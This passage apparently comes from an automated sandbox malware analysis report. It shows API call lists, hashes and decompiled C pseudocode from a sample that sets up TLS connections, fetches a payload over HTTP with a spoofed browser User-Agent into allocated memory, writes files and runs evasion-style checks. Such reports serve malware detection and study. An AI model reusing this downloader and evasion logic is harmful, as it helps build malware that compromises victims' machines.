                            • Instruction Fuzzy Hash: 9E315071D0020CBADF10EBA1CD46FDE777DAF04314F004466F605B61D1D7B9AA649B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(00000000,0041400C,0041302A), ref: 00412B76
                            • GetNamedPipeHandleStateW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412B83
                            • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412B90
                            • AddRefActCtx.KERNEL32(00000000), ref: 00412B97
                            • ActivateActCtx.KERNEL32(00000000,00000000), ref: 00412B9F
                            • WritePrivateProfileStructW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00412BAA
                            • SetFileApisToOEM.KERNEL32 ref: 00412BB0
                            • TlsGetValue.KERNEL32(00000000), ref: 00412BB7
                            • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412BC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.244956693.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: Handle$ActivateApisCompareDuplicateFileLibraryLoadNamedPipePrivateProfileStateStringStructValueWrite
                            • String ID:
                            • API String ID: 3492477940-0
                            • Opcode ID: f597ca519d29c27e0628131cc0eed75a6167057b7345dd2de09fb72d8d9bc977
                            • Instruction ID: a53385f50ff9c65cf719462552c4f15090d34ad7fbeb200d28de157dd7458512
                            • Opcode Fuzzy Hash: f597ca519d29c27e0628131cc0eed75a6167057b7345dd2de09fb72d8d9bc977
                            • Instruction Fuzzy Hash: F1F07A36006861AB83116F66ED0C9CE3F78BF9E3567018175F75682121CB285646CBAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00402FB6(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                            				intOrPtr _v12;
                            				char _v16;
                            				long _v60;
                            				char _v64;
                            				intOrPtr _v108;
                            				void** _v112;
                            				intOrPtr _v116;
                            				void* _v120;
                            				void* _v124;
                            				intOrPtr _v128;
                            				void* _v132;
                            				char* _v136;
                            				intOrPtr _v140;
                            				void* _v144;
                            				void* _v148;
                            				void* _v152;
                            				void* _v156;
                            				char _v160;
                            				intOrPtr _v164;
                            				char _v168;
                            				char _v172;
                            				void* _v176;
                            				void* _v180;
                            				void* _v188;
                            				long* _t102;
                            				void* _t113;
                            				void* _t117;
                            				void** _t131;
                            				void* _t146;
                            
                            				E004066D2( &_v188,  &_v16 - _t146);
                            				E004066D2(_a12, 8);
                            				E004066D2(_a16, 8);
                            				_v60 = 4;
                            				_v12 = 0x18;
                            				_push(0);
                            				_push(_a16);
                            				_push(0);
                            				_push(0);
                            				_t102 =  &_v60;
                            				_push(_t102);
                            				_push(0);
                            				_push(2);
                            				_push("Microsoft Unified Security Protocol Provider");
                            				_push(0);
                            				L004071C6();
                            				_t148 = _t102;
                            				if(_t102 != 0 || E00402765(__edx, _t148,  &_v64, _a4, _a8, 0xa) == 0) {
                            					L28:
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					E0040664B( &_v64, _a20, 4);
                            					_v108 = 0xc11c;
                            					_v132 = 0;
                            					_v128 = 2;
                            					_v124 = 0;
                            					_v120 = 0;
                            					_v116 = 1;
                            					_v112 =  &_v132;
                            					_push(0);
                            					_push( &_v172);
                            					_push( &_v120);
                            					_push(_a12);
                            					_push(0);
                            					_push(0);
                            					_push(0x10);
                            					_push(0);
                            					_push(_v108);
                            					_push(_a4);
                            					_push(0);
                            					_push(_a16);
                            					L004071FC();
                            					if(_v132 == 0 || _v124 == 0) {
                            						goto L28;
                            					} else {
                            						E004062FA(_v64, _v124, _v132, 0);
                            						_push(_v124);
                            						L004071DE();
                            						_t113 = VirtualAlloc(0, 0x8000, 0x3000, 4);
                            						if(_t113 == 0) {
                            							goto L28;
                            						}
                            						_v176 = _t113;
                            						_v188 = 0x90312;
                            						_v180 = 0;
                            						while(_v188 == 0x90312 || _v188 == 0x80090318 || _v188 == 0x90320) {
                            							__eflags = _v180;
                            							if(__eflags == 0) {
                            								L8:
                            								_t117 = E004063CD(__eflags, _v64, _v176 + _v180, 0x8000 - _v180, 0xa);
                            								__eflags = _t117;
                            								if(_t117 == 0) {
                            									break;
                            								}
                            								__eflags = _t117;
                            								if(_t117 < 0) {
                            									break;
                            								}
                            								_t43 =  &_v180;
                            								 *_t43 = _v180 + _t117;
                            								__eflags =  *_t43;
                            								L11:
                            								_v132 = 0;
                            								_v128 = 2;
                            								_v124 = 0;
                            								_v120 = 0;
                            								_v116 = 1;
                            								_v112 =  &_v132;
                            								E0040664B( &_v180,  &_v168, 4);
                            								_v164 = 2;
                            								E0040664B( &_v176,  &_v160, 4);
                            								_v156 = 0;
                            								_v152 = 0;
                            								_v148 = 0;
                            								_v144 = 0;
                            								_v140 = 2;
                            								_v136 =  &_v168;
                            								_push(0);
                            								_push( &_v172);
                            								_push( &_v120);
                            								_push(0);
                            								_push(0);
                            								_t131 =  &_v144;
                            								_push(_t131);
                            								_push(0x10);
                            								_push(0);
                            								_push(_v108);
                            								_push(0);
                            								_push(_a12);
                            								_push(_a16);
                            								L004071FC();
                            								_v188 = _t131;
                            								__eflags = _v188 - 0x80090318;
                            								if(_v188 == 0x80090318) {
                            									continue;
                            								}
                            								__eflags = _v188;
                            								if(_v188 < 0) {
                            									break;
                            								}
                            								__eflags = _v188;
                            								if(_v188 == 0) {
                            									L17:
                            									E004062FA(_v64, _v124, _v132, 0);
                            									_push(_v124);
                            									L004071DE();
                            									L18:
                            									__eflags = _v188 - 0x90320;
                            									if(_v188 != 0x90320) {
                            										__eflags = _v152 - 5;
                            										if(_v152 != 5) {
                            											_v180 = 0;
                            										} else {
                            											E0040664B( &_v156,  &_v180, 4);
                            											E0040664B(_v176 + _v180 - _v156, _v176, _v156);
                            											_v188 = 0x90312;
                            										}
                            										continue;
                            									}
                            									break;
                            								}
                            								__eflags = _v188 - 0x90312;
                            								if(_v188 != 0x90312) {
                            									goto L18;
                            								}
                            								__eflags = _v132;
                            								if(_v132 == 0) {
                            									goto L18;
                            								}
                            								__eflags = _v124;
                            								if(_v124 == 0) {
                            									goto L18;
                            								}
                            								goto L17;
                            							}
                            							__eflags = _v188 - 0x80090318;
                            							if(__eflags != 0) {
                            								goto L11;
                            							}
                            							goto L8;
                            						}
                            						E004048E1( &_v176);
                            						if(_v188 != 0) {
                            							goto L28;
                            						}
                            						return _v64;
                            					}
                            				}
                            			}
































                            0x00402fcd
                            0x00402fd7
                            0x00402fe1
                            0x00402fe6
                            0x00402fed
                            0x00402ff4
                            0x00402ff6
                            0x00402ff9
                            0x00402ffb
                            0x00402ffd
                            0x00403000
                            0x00403001
                            0x00403003
                            0x00403005
                            0x0040300a
                            0x0040300c
                            0x00403011
                            0x00403013
                            0x00403325
                            0x00403325
                            0x00000000
                            0x00403032
                            0x0040303b
                            0x00403040
                            0x00403047
                            0x0040304e
                            0x00403055
                            0x0040305c
                            0x00403063
                            0x0040306d
                            0x00403070
                            0x00403078
                            0x0040307c
                            0x0040307d
                            0x00403080
                            0x00403082
                            0x00403084
                            0x00403086
                            0x00403088
                            0x0040308b
                            0x0040308e
                            0x00403090
                            0x00403093
                            0x0040309c
                            0x00000000
                            0x004030ac
                            0x004030b7
                            0x004030bc
                            0x004030bf
                            0x004030d2
                            0x004030d9
                            0x00000000
                            0x00000000
                            0x004030df
                            0x004030e5
                            0x004030ef
                            0x004032db
                            0x004030fe
                            0x00403105
                            0x00403113
                            0x00403136
                            0x00403136
                            0x00403138
                            0x00000000
                            0x00000000
                            0x0040313e
                            0x00403141
                            0x00000000
                            0x00000000
                            0x00403147
                            0x00403147
                            0x00403147
                            0x0040314d
                            0x0040314d
                            0x00403154
                            0x0040315b
                            0x00403162
                            0x00403169
                            0x00403173
                            0x00403186
                            0x0040318b
                            0x004031a5
                            0x004031aa
                            0x004031b4
                            0x004031be
                            0x004031c8
                            0x004031d2
                            0x004031e2
                            0x004031e8
                            0x004031f0
                            0x004031f4
                            0x004031f5
                            0x004031f7
                            0x004031f9
                            0x004031ff
                            0x00403200
                            0x00403202
                            0x00403204
                            0x00403207
                            0x00403209
                            0x0040320c
                            0x0040320f
                            0x00403214
                            0x0040321a
                            0x00403224
                            0x00000000
                            0x00000000
                            0x0040322a
                            0x00403231
                            0x00000000
                            0x00000000
                            0x00403237
                            0x0040323e
                            0x00403258
                            0x00403263
                            0x00403268
                            0x0040326b
                            0x00403270
                            0x00403270
                            0x0040327a
                            0x00403281
                            0x00403288
                            0x004032d1
                            0x0040328a
                            0x004032a0
                            0x004032c0
                            0x004032c5
                            0x004032c5
                            0x00000000
                            0x00403288
                            0x00000000
                            0x0040327c
                            0x00403240
                            0x0040324a
                            0x00000000
                            0x00000000
                            0x0040324c
                            0x00403250
                            0x00000000
                            0x00000000
                            0x00403252
                            0x00403256
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403256
                            0x00403107
                            0x00403111
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403111
                            0x00403312
                            0x0040331e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403320
                            0x0040309c

                            APIs
                            • AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000,?,00000008,?,00000008,?,?,?), ref: 0040300C
                              • Part of subcall function 00402765: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 00402787
                              • Part of subcall function 00402765: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027B7
                              • Part of subcall function 00402765: inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 004027FA
                              • Part of subcall function 00402765: htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 0040281B
                              • Part of subcall function 00402765: ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402843
                              • Part of subcall function 00402765: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 00402851
                              • Part of subcall function 00402765: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 00402877
                              • Part of subcall function 00402765: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 0040289A
                            • InitializeSecurityContextA.SECUR32(?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?,00000000,?,?,00000004,?), ref: 00403093
                              • Part of subcall function 004062FA: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00406315
                              • Part of subcall function 004062FA: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00406372
                            • FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?), ref: 004030BF
                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004,?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000), ref: 004030D2
                            • InitializeSecurityContextA.SECUR32(?,?,00000000,?,00000000,00000010,?,00000000,00000000,?,?,00000000,?,?,00000004,?), ref: 0040320F
                            • FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000010,?,00000000,00000000,?,?), ref: 0040326B
                            Strings
                            • Microsoft Unified Security Protocol Provider, xrefs: 00403005
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Context$BufferFreeInitializeSecurityioctlsocket$AcquireAllocCredentialsEventHandleObjectSingleVirtualWaitconnecthtonsinet_addrselectsetsockoptsocket
                            • String ID: Microsoft Unified Security Protocol Provider
                            • API String ID: 1399349435-238809041
                            • Opcode ID: 23d93bd7d967eb9a447ef5fd7391a6175ae88e46989c31b957aeb1f1387d6edc
                            • Instruction ID: 73b563d7eface8bbf42f3218d9b3bcff62042970f8dc2876ab0d2a73f05d3314
                            • Opcode Fuzzy Hash: 23d93bd7d967eb9a447ef5fd7391a6175ae88e46989c31b957aeb1f1387d6edc
                            • Instruction Fuzzy Hash: F8914E7190431CAEEF60DF90CC85BDEBA79BB04309F1040AAF609761D1CBB95A98DF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EnumWindows.USER32(00405DB5,00000000), ref: 0067132B
                            • Sleep.KERNEL32(00002710,00405DB5,00000000), ref: 00671335
                            • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 0067133A
                              • Part of subcall function 00676431: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 0067648D
                              • Part of subcall function 00676431: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 00676497
                              • Part of subcall function 00676431: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 006764AE
                              • Part of subcall function 00676431: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 006764BE
                              • Part of subcall function 00676431: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 006764D6
                              • Part of subcall function 00676431: CloseHandle.KERNEL32(?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 006764DE
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00002710,00405DB5,00000000), ref: 00671362
                            • Sleep.KERNEL32(0000EA60), ref: 006713AE
                            • ExitProcess.KERNEL32(00000000,orvsmwx), ref: 00677237
                              • Part of subcall function 00674B5E: Sleep.KERNEL32(00002710,?), ref: 00674B7C
                              • Part of subcall function 00674B5E: Sleep.KERNEL32(0002BF20,00000000,?,00409080,0000000A,?,?,00409076,000000FF,?), ref: 00674C59
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$Local$Free$AllocAuthorityCloseEnumEnvironmentExitFileFirmwareHandleInformationModuleNameProcessTokenVariableWindows
                            • String ID: orvsmwx
                            • API String ID: 3750572613-3620674537
                            • Opcode ID: aa88cbd92d9dea9d6ec841a6b2bc50ab1e7ef0ee5f88250e0c44f59f496491d5
                            • Instruction ID: a79b5ec65ebdd533317e74cd3b9b6e9cca1a5210eaf334005f9b1a479f10568d
                            • Opcode Fuzzy Hash: aa88cbd92d9dea9d6ec841a6b2bc50ab1e7ef0ee5f88250e0c44f59f496491d5
                            • Instruction Fuzzy Hash: 94018B3078821475EB61B7B08C47FE9625FAF04B00F5484AAB72DBD0C7D9F45B414A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • inet_addr.WS2_32(?), ref: 00672A4A
                            • htons.WS2_32(00000000), ref: 00672A6B
                            • ioctlsocket.WS2_32(?,8004667E,?), ref: 00672A93
                            • connect.WS2_32(?,?,00000010), ref: 00672AA1
                            • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00672AC7
                            • ioctlsocket.WS2_32(?,8004667E,?), ref: 00672AEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ioctlsocket$connecthtonsinet_addrselect
                            • String ID:
                            • API String ID: 2081129316-0
                            • Opcode ID: 4473d6015e8577f6f6d9069912228f8aac79e066969601dc77cbaef7e280ae69
                            • Instruction ID: f7b8bc8b5927c14be524f40f62ef63eedf9f670ae03748c511ec724e1daab2a6
                            • Opcode Fuzzy Hash: 4473d6015e8577f6f6d9069912228f8aac79e066969601dc77cbaef7e280ae69
                            • Instruction Fuzzy Hash: 86310C7190021DBADF60EBA0CC46FDE777EAB08314F108499F608B6191E7B19A549B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 0067648D
                            • LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 00676497
                            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 006764AE
                            • GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 006764BE
                            • LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 006764D6
                            • CloseHandle.KERNEL32(?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 006764DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Free$AllocAuthorityCloseHandleInformationToken
                            • String ID:
                            • API String ID: 1586583212-0
                            • Opcode ID: 28e19afb72b878737e7b87120f99f08cca91ff0df2a44fe410a1d31da2b3ae9b
                            • Instruction ID: 3e5da68fbf6bf20b6876791d1646703f5c6bc6c66166156cfa73f69b97bda946
                            • Opcode Fuzzy Hash: 28e19afb72b878737e7b87120f99f08cca91ff0df2a44fe410a1d31da2b3ae9b
                            • Instruction Fuzzy Hash: 78117F31D04209BADF41EBE0CC02FEFB7BABF04310F10C869B628B5191DB714A10AB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CoInitialize.OLE32(00000000), ref: 00675AB6
                              • Part of subcall function 00676431: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 0067648D
                              • Part of subcall function 00676431: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 00676497
                              • Part of subcall function 00676431: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 006764AE
                              • Part of subcall function 00676431: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 006764BE
                              • Part of subcall function 00676431: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 006764D6
                              • Part of subcall function 00676431: CloseHandle.KERNEL32(?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?,?,?,00000003), ref: 006764DE
                            • GetLocalTime.KERNEL32(?,?,00000030,?,006757BD,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 00675C4B
                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,006757BD,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00675C5E
                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,006757BD,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00675C8F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$Local$FileFreeSystem$AllocAuthorityCloseHandleInformationInitializeToken
                            • String ID: 0
                            • API String ID: 1744783010-4108050209
                            • Opcode ID: f1aa835b88c44718de5cf4fd25f262d079a8a8df514dda1fa84e69f066ad5f49
                            • Instruction ID: a812530c94e380d9d7bf00aea76909a8d43f2fde4d6232719780ef778aaacdc4
                            • Opcode Fuzzy Hash: f1aa835b88c44718de5cf4fd25f262d079a8a8df514dda1fa84e69f066ad5f49
                            • Instruction Fuzzy Hash: EEA1F6B5900618AFDB50EB94CC85FDAB3BDAF48304F1080DAF609E7251D675AE85CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406AA4(CHAR* _a4, void* _a8, long _a12, long _a16, long _a20) {
                            				void* _v8;
                            				long _v12;
                            				intOrPtr _v16;
                            				void* _t16;
                            
                            				_v16 = 0x64;
                            				while(1) {
                            					_t16 = CreateFileA(_a4, 0x40000000, 0, 0, _a16, 0x80, 0);
                            					_v8 = _t16;
                            					if(_t16 != 0xffffffff || _v16 == 0) {
                            						break;
                            					}
                            					_v16 = _v16 - 1;
                            				}
                            				if(_v8 != 0xffffffff) {
                            					SetFilePointer(_v8, 0, 0, _a20);
                            					WriteFile(_v8, _a8, _a12,  &_v12, 0);
                            					return CloseHandle(_v8);
                            				}
                            				return _t16;
                            			}







                            0x00406aad
                            0x00406ab4
                            0x00406aca
                            0x00406acf
                            0x00406ad5
                            0x00000000
                            0x00000000
                            0x00406add
                            0x00406add
                            0x00406ae6
                            0x00406af2
                            0x00406b06
                            0x00000000
                            0x00406b0e
                            0x00406b17

                            APIs
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00406ACA
                            • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00406AF2
                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00406B06
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00406B0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID: d
                            • API String ID: 3604237281-2564639436
                            • Opcode ID: 9e4065064044173d6686801a2ec659f311412e239a977e04973cd8e75cfc1167
                            • Instruction ID: ed086ded89d8a7c819e13077a811e8215b340b8a3de052a5363287cb167353cf
                            • Opcode Fuzzy Hash: 9e4065064044173d6686801a2ec659f311412e239a977e04973cd8e75cfc1167
                            • Instruction Fuzzy Hash: 9D014F31A40208FADF219F95CC02FCE7779AB01728F208266B621781E1D7756A60EB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00402BA7(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				char _v16;
                            				char _v28;
                            				char _v1052;
                            				char _v1056;
                            				long _v1060;
                            				char _v1068;
                            				char _v1076;
                            				char _v1080;
                            				void* _t50;
                            				void* _t60;
                            				char* _t72;
                            				void* _t75;
                            				long _t82;
                            				char _t86;
                            				intOrPtr* _t87;
                            				void* _t88;
                            				void* _t90;
                            
                            				_t90 = __eflags;
                            				E004066D2( &_v1080,  &_v16 - _t88);
                            				E004048E1(_a16);
                            				_t50 = E00402FB6(__edx, _t90, _a4, _a8,  &_v1068,  &_v1076,  &_v8);
                            				_t91 = _t50;
                            				if(_t50 != 0) {
                            					E00404484(_t91, _v8,  &_v1052, wsprintfA( &_v1052, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0,  &_v1068);
                            					while(1) {
                            						E00406698(_v8, 0,  &_v28, 0xa, 0);
                            						_push( &_v16);
                            						_push(0);
                            						_push(0);
                            						_t72 =  &_v28;
                            						_push(_t72);
                            						_push(0);
                            						L0040717E();
                            						_t92 = _t72;
                            						if(_t72 <= 0) {
                            							goto L5;
                            						}
                            						_t75 = E004045B9(_t92, _v8,  &_v1080,  &_v1068);
                            						if(_t75 > 0) {
                            							_v1060 = _v1060 + _t75;
                            							E00404842( &_v1056, _v1060, _v1080, _t75);
                            							E004048E1( &_v1080);
                            							continue;
                            						}
                            						goto L5;
                            					}
                            				}
                            				L5:
                            				E00406474( &_v1068,  &_v1076, _v8);
                            				__eflags = _v1060;
                            				if(_v1060 == 0) {
                            					L13:
                            					E004048E1( &_v1056);
                            					_v1060 = 0;
                            				} else {
                            					_t87 = _v1056;
                            					_t82 = _v1060;
                            					while(1) {
                            						__eflags = _t82 - 4;
                            						if(_t82 < 4) {
                            							goto L13;
                            						}
                            						__eflags =  *_t87 - 0xa0d0a0d;
                            						if( *_t87 != 0xa0d0a0d) {
                            							L11:
                            							_t87 = _t87 + 1;
                            							_t82 = _t82 - 1;
                            							__eflags = _t82;
                            							continue;
                            						} else {
                            							_t82 = _t82 - 4;
                            							_t87 = _t87 + 4;
                            							__eflags = _t82;
                            							if(_t82 <= 0) {
                            								goto L11;
                            							} else {
                            								_v1060 = _t82;
                            								_t60 = VirtualAlloc(0, _v1060, 0x3000, 4);
                            								__eflags = _t60;
                            								if(_t60 == 0) {
                            									goto L13;
                            								} else {
                            									_t86 = _t60;
                            									E0040664B(_t87, _t86, _v1060);
                            									E004048E1( &_v1056);
                            									_v1056 = _t86;
                            								}
                            							}
                            						}
                            						goto L14;
                            					}
                            					goto L13;
                            				}
                            				L14:
                            				E0040664B( &_v1056, _a16, 4);
                            				return _v1060;
                            			}





















                            0x00402ba7
                            0x00402bbe
                            0x00402bc6
                            0x00402be3
                            0x00402be8
                            0x00402bea
                            0x00402c20
                            0x00402c25
                            0x00402c32
                            0x00402c3a
                            0x00402c3b
                            0x00402c3d
                            0x00402c3f
                            0x00402c42
                            0x00402c43
                            0x00402c45
                            0x00402c4a
                            0x00402c4c
                            0x00000000
                            0x00000000
                            0x00402c5f
                            0x00402c66
                            0x00402c6e
                            0x00402c83
                            0x00402c8f
                            0x00000000
                            0x00402c8f
                            0x00000000
                            0x00402c66
                            0x00402c25
                            0x00402c96
                            0x00402ca7
                            0x00402cac
                            0x00402cb3
                            0x00402d1e
                            0x00402d25
                            0x00402d2a
                            0x00402cb5
                            0x00402cb5
                            0x00402cbb
                            0x00402d19
                            0x00402d19
                            0x00402d1c
                            0x00000000
                            0x00000000
                            0x00402cc3
                            0x00402cc9
                            0x00402d17
                            0x00402d17
                            0x00402d18
                            0x00402d18
                            0x00000000
                            0x00402ccb
                            0x00402ccb
                            0x00402cce
                            0x00402cd1
                            0x00402cd4
                            0x00000000
                            0x00402cd6
                            0x00402cd6
                            0x00402cf0
                            0x00402cf0
                            0x00402cf2
                            0x00000000
                            0x00402cf4
                            0x00402cf4
                            0x00402cfe
                            0x00402d0a
                            0x00402d0f
                            0x00402d0f
                            0x00402cf2
                            0x00402cd4
                            0x00000000
                            0x00402cc9
                            0x00000000
                            0x00402d19
                            0x00402d34
                            0x00402d40
                            0x00402d4f

                            APIs
                              • Part of subcall function 004048E1: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00405802,?,?,?,?,?,?,00000000,00000006), ref: 004048F8
                              • Part of subcall function 00402FB6: AcquireCredentialsHandleA.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000,?,00000008,?,00000008,?,?,?), ref: 0040300C
                              • Part of subcall function 00402FB6: InitializeSecurityContextA.SECUR32(?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?,00000000,?,?,00000004,?), ref: 00403093
                              • Part of subcall function 00402FB6: FreeContextBuffer.SECUR32(?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000,00000000,?,?,?), ref: 004030BF
                              • Part of subcall function 00402FB6: VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004,?,?,?,?,00000000,?,00000000,?,?,00000000,00000010,00000000), ref: 004030D2
                            • wsprintfA.USER32 ref: 00402C02
                            • select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,0000000A,00000000,?,?,00000000,00000000,?), ref: 00402C45
                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402CEB
                              • Part of subcall function 004045B9: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,?), ref: 004045F2
                              • Part of subcall function 004045B9: DecryptMessage.SECUR32(?,?,00000000,00000000,?,?,00000004,?,?,00000004,?,?,?,00000000,00000000,?), ref: 004046DB
                            Strings
